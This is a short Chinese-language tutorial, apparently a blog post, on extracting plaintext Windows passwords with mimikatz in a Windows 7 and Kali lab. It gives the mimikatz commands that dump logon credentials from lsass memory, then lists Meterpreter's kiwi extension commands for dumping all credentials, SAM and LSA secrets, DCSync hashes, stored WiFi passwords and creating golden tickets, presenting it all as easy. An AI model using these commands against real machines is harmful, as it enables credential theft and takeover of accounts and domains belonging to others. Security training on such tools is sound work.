获取Windows明文密码的方式

关于mimikatz

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器，它具备很多功能，其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等等，mimikatz包含了很多本地模块，更像是一个轻量级的调试器。

项目地址

https://github.com/gentilkiwi/mimikatz/releases/latest
https://github.com/gentilkiwi/mimikatz

实验环境

• Windows 7
• Kali Linux

使用

运行mimikatz.exe 需要用管理员权限运行

分别输入下面命令

privilege::debug
sekurlsa::logonpasswords

然后下来我们可以看到已经获取到明文密码了

怎么样，很简单吧！

当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码

但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
意思是在高版本中启用了mimikatz改用了kiwi。
好吧，既然提高了kiwi我们来看看kiwi怎么用

关于kiwi

meterpreter > help kiwi #查看帮助
Kiwi Commands
=============
Command                Description
-------                -----------
creds_all              #列举所有凭据/所有的系统密码
creds_kerberos         #列举所有kerberos凭据
creds_msv              #列举所有msv凭据
creds_ssp              #列举所有ssp凭据
creds_tspkg            #列举所有tspkg凭据
creds_wdigest          #列举所有wdigest凭据
dcsync                 #通过DCSync检索用户帐户信息
dcsync_ntlm            #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create   #创建黄金票据
kerberos_ticket_list   #列举kerberos票据
kerberos_ticket_purge  #清除kerberos票据
kerberos_ticket_use    #使用kerberos票据
kiwi_cmd               #kiwi_cmd 模块可以让我们使用mimikatz的全部功能，该命令后面接 mimikatz.exe 的命令
lsa_dump_sam           #dump出lsa的SAM
lsa_dump_secrets       #dump出lsa的密文
password_change        #修改密码
wifi_list              #列出当前用户的wifi配置文件
wifi_list_shared       #列出共享wifi配置文件/编码

如，我们用wiki获取系统密码

creds_all

查看电脑连过的所有WiFi密码

wifi_list_shared 

当然你想非要在msfconsole中使用mimikatz的话，也不是没有办法，只需执行下面命令即可

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

换而言之，就是将kiwi命令与mimikatz两者相结合。